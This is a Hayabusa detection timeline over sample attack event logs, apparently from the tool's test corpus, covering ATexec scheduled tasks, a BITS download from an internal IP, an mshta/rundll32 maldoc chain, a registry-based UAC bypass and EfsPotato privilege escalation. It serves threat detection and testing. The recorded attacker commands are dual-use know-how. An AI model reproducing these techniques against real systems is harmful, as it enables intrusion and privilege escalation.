(susp. arg.).evtx +2021-06-10 21:21:26.406 +00:00,fs01.offsec.lan,4699,medium,Exec | PrivEsc,Scheduled Task Deletion,,rules/sigma/builtin/security/win_scheduled_task_deletion.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1053.005-Scheduled Task/ID4698-4699-Fast created & deleted task by ATexec (susp. 
arg.).evtx +2021-06-10 21:21:26.406 +00:00,fs01.offsec.lan,4699,info,,Task Deleted,Name: \bouWFQYO | User: admmig | LID: 0x5a419bc,rules/hayabusa/non-default/events/Security/ScheduledTasks/4699_ScheduledTaskDeleted.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,4698,4699,5145,4624-ATexec remote trask creation (GLOBAL).evtx" +2021-06-10 21:21:26.406 +00:00,fs01.offsec.lan,4699,medium,Exec | PrivEsc,Scheduled Task Deletion,,rules/sigma/builtin/security/win_scheduled_task_deletion.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,4698,4699,5145,4624-ATexec remote trask creation (GLOBAL).evtx" +2021-06-10 21:21:26.415 +00:00,fs01.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: Temp\bouWFQYO.tmp | IP Addr: 10.23.123.11 | LID: 0x5a41984,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1053.005-Scheduled Task/ID5145-Remote schedule task creation (ATexec).evtx +2021-06-10 21:21:26.415 +00:00,fs01.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: Temp\bouWFQYO.tmp | IP Addr: 10.23.123.11 | LID: 0x5a41984,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,4698,4699,5145,4624-ATexec remote trask creation (GLOBAL).evtx" +2021-06-10 21:21:26.424 +00:00,fs01.offsec.lan,4688,low,Disc,Local Accounts Discovery,,rules/sigma/process_creation_builtin/proc_creation_win_local_system_owner_account_discovery.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,4698,4699,5145,4624-ATexec remote trask creation (GLOBAL).evtx" +2021-06-10 21:21:26.424 +00:00,fs01.offsec.lan,4688,medium,Disc,Whoami 
Execution,,rules/sigma/process_creation_builtin/proc_creation_win_susp_whoami.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,4698,4699,5145,4624-ATexec remote trask creation (GLOBAL).evtx" +2021-06-10 21:21:29.427 +00:00,fs01.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: Temp\bouWFQYO.tmp | IP Addr: 10.23.123.11 | LID: 0x5a41984,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1053.005-Scheduled Task/ID5145-Remote schedule task creation (ATexec).evtx +2021-06-10 21:21:29.427 +00:00,fs01.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: Temp\bouWFQYO.tmp | IP Addr: 10.23.123.11 | LID: 0x5a41984,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,4698,4699,5145,4624-ATexec remote trask creation (GLOBAL).evtx" +2021-06-10 21:21:29.441 +00:00,fs01.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: Temp\bouWFQYO.tmp | IP Addr: 10.23.123.11 | LID: 0x5a41984,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1053.005-Scheduled Task/ID5145-Remote schedule task creation (ATexec).evtx +2021-06-10 21:21:29.441 +00:00,fs01.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: Temp\bouWFQYO.tmp | IP Addr: 10.23.123.11 | LID: 
0x5a41984,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,4698,4699,5145,4624-ATexec remote trask creation (GLOBAL).evtx" +2021-06-13 06:17:18.044 +00:00,sv-dc.hinokabegakure-no-sato.local,3,low,Evas | Persis,Suspicious Task Added by Bitsadmin,,rules/sigma/builtin/bits_client/win_bits_client_susp_use_bitsadmin.yml,../hayabusa-sample-evtx/YamatoSecurity/T1197_BITS Jobs/Windows-BitsClient.evtx +2021-06-13 06:17:18.087 +00:00,sv-dc.hinokabegakure-no-sato.local,59,info,Evas | Persis,Bits Job Created,Job Title: test | URL: http://192.168.10.254:80/calc.exe,rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/YamatoSecurity/T1197_BITS Jobs/Windows-BitsClient.evtx +2021-08-07 23:32:57.348 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Program Files\Microsoft Office\Office14\WINWORD.EXE"" /n ""C:\Users\IEUser\Desktop\stats.doc"" | Process: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x7a857 | PID: 3424 | PGUID: 747F3D96-1829-610F-0000-0010A33FD200",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Other/maldoc_mshta_via_shellbrowserwind_rundll32.evtx +2021-08-07 23:33:01.103 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\SysWOW64\mshta.exe"" ""C:\Users\Public\memViewData.hta"" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5} | Process: C:\Windows\SysWOW64\mshta.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x7a857 | PID: 9932 | PGUID: 747F3D96-182D-610F-0000-00106F40D300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Other/maldoc_mshta_via_shellbrowserwind_rundll32.evtx +2021-08-07 23:33:01.103 +00:00,MSEDGEWIN10,1,high,Exec,Suspicious MSHTA Process 
Patterns,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_mshta_pattern.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Other/maldoc_mshta_via_shellbrowserwind_rundll32.evtx +2021-08-07 23:33:01.103 +00:00,MSEDGEWIN10,1,high,Evas | Exec,MSHTA Suspicious Execution 01,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_mshta_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Other/maldoc_mshta_via_shellbrowserwind_rundll32.evtx +2021-08-07 23:33:01.176 +00:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k LocalService -p -s fdPHost | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: ? | LID: 0x3e5 | PID: 11196 | PGUID: 747F3D96-182D-610F-0000-00100344D300,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Other/maldoc_mshta_via_shellbrowserwind_rundll32.evtx +2021-08-07 23:33:01.176 +00:00,MSEDGEWIN10,1,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_sysmon/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Other/maldoc_mshta_via_shellbrowserwind_rundll32.evtx +2021-08-07 23:33:01.176 +00:00,MSEDGEWIN10,1,high,Evas,Suspicious Svchost Process,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_svchost.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Other/maldoc_mshta_via_shellbrowserwind_rundll32.evtx +2021-08-07 23:33:08.346 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\System32\rundll32.exe"" c:\users\public\memViewData.jpg,PluginInit | Process: C:\Windows\SysWOW64\rundll32.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\SysWOW64\mshta.exe"" ""C:\Users\Public\memViewData.hta"" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5} | LID: 0x7a857 | PID: 6576 | PGUID: 
747F3D96-1834-610F-0000-00105FE5D300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Other/maldoc_mshta_via_shellbrowserwind_rundll32.evtx +2021-08-07 23:33:08.346 +00:00,MSEDGEWIN10,1,high,,Application Executed Non-Executable Extension,,rules/sigma/process_creation_sysmon/proc_creation_win_run_executable_invalid_extension.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Other/maldoc_mshta_via_shellbrowserwind_rundll32.evtx +2021-08-07 23:33:15.303 +00:00,MSEDGEWIN10,1,info,,Process Created,Cmd: cmd /c start /min C:\Users\Public\KDECO.bat reg delete hkcu\Environment /v windir /f && REM \system32\AppHostRegistrationVerifier.exe | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ? | LID: 0x7a857 | PID: 11324 | PGUID: 747F3D96-183B-610F-0000-0010DC6CD400,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Other/maldoc_mshta_via_shellbrowserwind_rundll32.evtx +2021-08-07 23:33:15.303 +00:00,MSEDGEWIN10,1,low,Disc,Local Accounts Discovery,,rules/sigma/process_creation_sysmon/proc_creation_win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Other/maldoc_mshta_via_shellbrowserwind_rundll32.evtx +2021-08-22 19:33:38.725 +00:00,LAPTOP-JU4M3I0E,1,info,,Process Created,"Cmd: c:\temp\EfsPotato.exe whoami | Process: C:\temp\EfsPotato.exe | User: NT AUTHORITY\NETWORK SERVICE | Parent Cmd: ""cmd.exe"" | LID: 0x3e4 | PID: 14048 | PGUID: 00247C92-A691-6122-0000-001021C31F02",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx +2021-08-22 19:33:38.725 +00:00,LAPTOP-JU4M3I0E,1,low,Exec,Process Start From Suspicious Folder,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege 
Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx +2021-08-22 19:33:38.844 +00:00,LAPTOP-JU4M3I0E,17,info,,Pipe Created,\dd4c18dc-bff6-42ce-b707-62c114b84291\pipe\srvsvc | Process: c:\temp\EfsPotato.exe | PID: 14048 | PGUID: 00247C92-A691-6122-0000-001021C31F02,rules/hayabusa/sysmon/events/17_PipeCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx +2021-08-22 19:33:38.844 +00:00,LAPTOP-JU4M3I0E,17,critical,Evas | PrivEsc,EfsPotato Named Pipe,,rules/sigma/pipe_created/pipe_created_efspotato_namedpipe.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx +2021-08-22 19:33:38.881 +00:00,LAPTOP-JU4M3I0E,18,info,,Pipe Connected,\lsass | Process: System | PID: 4 | PGUID: 00247C92-707C-6122-0000-0010EB030000,rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx +2021-08-22 19:33:38.884 +00:00,LAPTOP-JU4M3I0E,18,info,,Pipe Connected,\dd4c18dc-bff6-42ce-b707-62c114b84291\pipe\srvsvc | Process: System | PID: 4 | PGUID: 00247C92-707C-6122-0000-0010EB030000,rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx +2021-08-22 19:33:38.884 +00:00,LAPTOP-JU4M3I0E,18,critical,Evas | PrivEsc,EfsPotato Named Pipe,,rules/sigma/pipe_created/pipe_created_efspotato_namedpipe.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx +2021-08-22 19:33:38.905 +00:00,LAPTOP-JU4M3I0E,1,info,,Process Created,Cmd: whoami | Process: C:\Windows\System32\whoami.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: c:\temp\EfsPotato.exe whoami | LID: 0x3e7 | PID: 11328 | PGUID: 
00247C92-A692-6122-0000-0010A5CD1F02,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx +2021-08-22 19:33:38.905 +00:00,LAPTOP-JU4M3I0E,1,low,Disc,Local Accounts Discovery,,rules/sigma/process_creation_sysmon/proc_creation_win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx +2021-08-22 19:33:38.905 +00:00,LAPTOP-JU4M3I0E,1,high,Disc,Whoami Execution Anomaly,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_whoami_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx +2021-08-22 19:33:38.905 +00:00,LAPTOP-JU4M3I0E,1,high,PrivEsc | Disc,Run Whoami as SYSTEM,,rules/sigma/process_creation_sysmon/proc_creation_win_whoami_as_system.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx +2021-08-22 19:33:38.905 +00:00,LAPTOP-JU4M3I0E,1,medium,Disc,Whoami Execution,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx +2021-08-22 19:33:38.997 +00:00,LAPTOP-JU4M3I0E,5,info,,Process Terminated,Process: C:\temp\EfsPotato.exe | PID: 14048 | PGUID: 00247C92-A691-6122-0000-001021C31F02,rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx +2021-08-22 19:33:40.014 +00:00,LAPTOP-JU4M3I0E,3,info,,Network Connection,tcp | Src: 0:0:0:0:0:0:0:1:53686 (LAPTOP-JU4M3I0E) | Dst: 0:0:0:0:0:0:0:1:445 (LAPTOP-JU4M3I0E) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 
00247C92-707C-6122-0000-0010EB030000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx +2021-08-22 19:33:40.014 +00:00,LAPTOP-JU4M3I0E,3,info,,Network Connection,tcp | Src: 0:0:0:0:0:0:0:1:53686 (LAPTOP-JU4M3I0E) | Dst: 0:0:0:0:0:0:0:1:445 (LAPTOP-JU4M3I0E) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 00247C92-707C-6122-0000-0010EB030000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx +2021-08-22 19:33:52.250 +00:00,LAPTOP-JU4M3I0E,1,info,,Process Created,"Cmd: ""C:\Users\bouss\AppData\Local\Microsoft\OneDrive\21.139.0711.0001\FileCoAuth.exe"" -Embedding | Process: C:\Users\bouss\AppData\Local\Microsoft\OneDrive\21.139.0711.0001\FileCoAuth.exe | User: LAPTOP-JU4M3I0E\bouss | Parent Cmd: C:\WINDOWS\system32\svchost.exe -k DcomLaunch -p | LID: 0xbf9eb | PID: 15488 | PGUID: 00247C92-A6A0-6122-0000-00102F592002",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx +2021-08-22 19:33:52.303 +00:00,LAPTOP-JU4M3I0E,7,low,,Image Loaded_Sysmon Alert,"Execution - Image Loaded from suspicious path | Image: C:\Users\bouss\AppData\Local\Microsoft\OneDrive\21.139.0711.0001\vcruntime140_1.dll | Process: C:\Users\bouss\AppData\Local\Microsoft\OneDrive\21.139.0711.0001\FileCoAuth.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 15488 | PGUID: 00247C92-A6A0-6122-0000-00102F592002 | Hash: 
SHA1=58D562E8E3496A97E0CFE34C64B7AC79F40A9367,MD5=639584D9FCDC54D7644328650028F453,SHA256=4EF85487DE3B07AB52D269A51CFC2499C2E77ECBE2C63EC556F2C59AAD311B81,IMPHASH=AE0BDE6314FA2027B54CE04898F6AB69",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx +2021-08-22 19:33:52.315 +00:00,LAPTOP-JU4M3I0E,7,low,,Image Loaded_Sysmon Alert,"Execution - Image Loaded from suspicious path | Image: C:\Users\bouss\AppData\Local\Microsoft\OneDrive\21.139.0711.0001\UpdateRingSettings.dll | Process: C:\Users\bouss\AppData\Local\Microsoft\OneDrive\21.139.0711.0001\FileCoAuth.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 15488 | PGUID: 00247C92-A6A0-6122-0000-00102F592002 | Hash: SHA1=50FBFD34BCB3A0CDCAE94D963AF6DA5B6EAAF702,MD5=E5783051077ECC0CF81051ACC6C7872D,SHA256=8E63CC1DDD7C554532FB00A2E3198D712ED19DD64EF6818119AFC2A5214148A8,IMPHASH=8B31BD73AB0C52BD4506C09FDABE59CE",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx +2021-08-22 19:33:52.324 +00:00,LAPTOP-JU4M3I0E,7,low,,Image Loaded_Sysmon Alert,"Execution - Image Loaded from suspicious path | Image: C:\Users\bouss\AppData\Local\Microsoft\OneDrive\21.139.0711.0001\LoggingPlatform.dll | Process: C:\Users\bouss\AppData\Local\Microsoft\OneDrive\21.139.0711.0001\FileCoAuth.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 15488 | PGUID: 00247C92-A6A0-6122-0000-00102F592002 | Hash: SHA1=479CD840A5352F76051B5722E4CD9004C72567EC,MD5=090BBA421A213F67FBFE10231116E008,SHA256=1E8923D71C32876B53A887983C63BC94914AB91CAAF1E13D3979F64F529DD043,IMPHASH=D39A0141F3324CB1CE047427FD20FCEA",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege 
Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx +2021-08-22 19:33:52.335 +00:00,LAPTOP-JU4M3I0E,7,low,,Image Loaded_Sysmon Alert,"Execution - Image Loaded from suspicious path | Image: C:\Users\bouss\AppData\Local\Microsoft\OneDrive\21.139.0711.0001\msvcp140.dll | Process: C:\Users\bouss\AppData\Local\Microsoft\OneDrive\21.139.0711.0001\FileCoAuth.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 15488 | PGUID: 00247C92-A6A0-6122-0000-00102F592002 | Hash: SHA1=6648A614B14F15ECB522A6D2BDF5E5031417742F,MD5=5BEB853A59982A96052364AB7BDE8D20,SHA256=CEACFE080276ACDF3FF731A8CA68140BCF589CEB1E3DD7544E0D4765E0489D9E,IMPHASH=4F1912F58F8D1AE7998EF5303198D62D",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx +2021-08-22 19:33:52.342 +00:00,LAPTOP-JU4M3I0E,7,low,,Image Loaded_Sysmon Alert,"Execution - Image Loaded from suspicious path | Image: C:\Users\bouss\AppData\Local\Microsoft\OneDrive\21.139.0711.0001\vcruntime140.dll | Process: C:\Users\bouss\AppData\Local\Microsoft\OneDrive\21.139.0711.0001\FileCoAuth.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 15488 | PGUID: 00247C92-A6A0-6122-0000-00102F592002 | Hash: SHA1=344B09330D8CC196728BC4320194FE49993D3A2C,MD5=B3FF2F3D0040F23F36E9F2A3444F42EA,SHA256=3A8DAE539BB91C950CCD6EA244D5C09CDF44AEBC8EE4FF9C5094D5195F40E82A,IMPHASH=44C3854843F7A3FCCDF8DDBBEA66F302",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx +2021-08-22 19:33:52.344 +00:00,LAPTOP-JU4M3I0E,7,low,,Image Loaded_Sysmon Alert,"Execution - Image Loaded from suspicious path | Image: C:\Users\bouss\AppData\Local\Microsoft\OneDrive\21.139.0711.0001\vcruntime140.dll | Process: 
C:\Users\bouss\AppData\Local\Microsoft\OneDrive\21.139.0711.0001\FileCoAuth.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 15488 | PGUID: 00247C92-A6A0-6122-0000-00102F592002 | Hash: SHA1=344B09330D8CC196728BC4320194FE49993D3A2C,MD5=B3FF2F3D0040F23F36E9F2A3444F42EA,SHA256=3A8DAE539BB91C950CCD6EA244D5C09CDF44AEBC8EE4FF9C5094D5195F40E82A,IMPHASH=44C3854843F7A3FCCDF8DDBBEA66F302",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx +2021-08-22 19:33:52.350 +00:00,LAPTOP-JU4M3I0E,7,low,,Image Loaded_Sysmon Alert,"Execution - Image Loaded from suspicious path | Image: C:\Users\bouss\AppData\Local\Microsoft\OneDrive\21.139.0711.0001\vcruntime140.dll | Process: C:\Users\bouss\AppData\Local\Microsoft\OneDrive\21.139.0711.0001\FileCoAuth.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 15488 | PGUID: 00247C92-A6A0-6122-0000-00102F592002 | Hash: SHA1=344B09330D8CC196728BC4320194FE49993D3A2C,MD5=B3FF2F3D0040F23F36E9F2A3444F42EA,SHA256=3A8DAE539BB91C950CCD6EA244D5C09CDF44AEBC8EE4FF9C5094D5195F40E82A,IMPHASH=44C3854843F7A3FCCDF8DDBBEA66F302",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx +2021-08-22 19:33:52.355 +00:00,LAPTOP-JU4M3I0E,7,low,,Image Loaded_Sysmon Alert,"Execution - Image Loaded from suspicious path | Image: C:\Users\bouss\AppData\Local\Microsoft\OneDrive\21.139.0711.0001\msvcp140.dll | Process: C:\Users\bouss\AppData\Local\Microsoft\OneDrive\21.139.0711.0001\FileCoAuth.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 15488 | PGUID: 00247C92-A6A0-6122-0000-00102F592002 | Hash: 
SHA1=6648A614B14F15ECB522A6D2BDF5E5031417742F,MD5=5BEB853A59982A96052364AB7BDE8D20,SHA256=CEACFE080276ACDF3FF731A8CA68140BCF589CEB1E3DD7544E0D4765E0489D9E,IMPHASH=4F1912F58F8D1AE7998EF5303198D62D",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx +2021-08-22 19:33:52.513 +00:00,LAPTOP-JU4M3I0E,7,low,,Image Loaded_Sysmon Alert,"Execution - Image Loaded from suspicious path | Image: C:\Users\bouss\AppData\Local\Microsoft\OneDrive\21.139.0711.0001\OneDriveTelemetryStable.dll | Process: C:\Users\bouss\AppData\Local\Microsoft\OneDrive\21.139.0711.0001\FileCoAuth.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 15488 | PGUID: 00247C92-A6A0-6122-0000-00102F592002 | Hash: SHA1=8D3D5F03E129C08F890847F7B12E620F9315B396,MD5=B01D2385E32F4251399C7EDCE8364967,SHA256=5E6CC575BEC320E4502B48B1050FE255BF6504013FAA6EE62A80707E3092383E,IMPHASH=C719A37B3234505BC0AADBB7DE7C9654",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx +2021-08-22 19:33:52.545 +00:00,LAPTOP-JU4M3I0E,7,low,,Image Loaded_Sysmon Alert,"Execution - Image Loaded from suspicious path | Image: C:\Users\bouss\AppData\Local\Microsoft\OneDrive\21.139.0711.0001\FileSyncTelemetryExtensions.dll | Process: C:\Users\bouss\AppData\Local\Microsoft\OneDrive\21.139.0711.0001\FileCoAuth.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 15488 | PGUID: 00247C92-A6A0-6122-0000-00102F592002 | Hash: SHA1=B535176F0E42CE3DEE9F650070AB1CAEA840CFBF,MD5=68E4FB636BC56B74BF54F18223238862,SHA256=1084C4AF96A06F8A84CA279C659394ACB1BC80D1F5DBC16EB62964C5632C41A0,IMPHASH=D207E97F105829D9C63E79F98B136D2B",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege 
Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx +2021-08-22 19:33:52.931 +00:00,LAPTOP-JU4M3I0E,7,low,,Image Loaded_Sysmon Alert,"Execution - Image Loaded from suspicious path | Image: C:\Users\bouss\AppData\Local\Microsoft\OneDrive\21.139.0711.0001\FileCoAuthLib64.dll | Process: C:\Users\bouss\AppData\Local\Microsoft\OneDrive\21.139.0711.0001\FileCoAuth.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 15488 | PGUID: 00247C92-A6A0-6122-0000-00102F592002 | Hash: SHA1=FFFD189CF1234EC54392F57C8D6D683A92DEB2B4,MD5=5E3A74A8E0295B1396C1A5D5D5C0664F,SHA256=E0132392E8014B120BBF51F2E98E9BB329877666A7D005353A4E96DF14DFFD4C,IMPHASH=592278570E604A14992850A5B210142D",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx +2021-10-01 17:30:39.083 +00:00,fs01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: at 13:20 /interactive cmd | Path: C:\Windows\System32\at.exe | PID: 0x15cc | User: admmig | LID: 0x65b0f5db,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1053.005-Scheduled Task/ID4688-Interactive shell using AT schedule task.evtx +2021-10-01 17:30:39.083 +00:00,fs01.offsec.lan,4688,high,PrivEsc,Interactive AT Job,,rules/sigma/process_creation_builtin/proc_creation_win_interactive_at.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1053.005-Scheduled 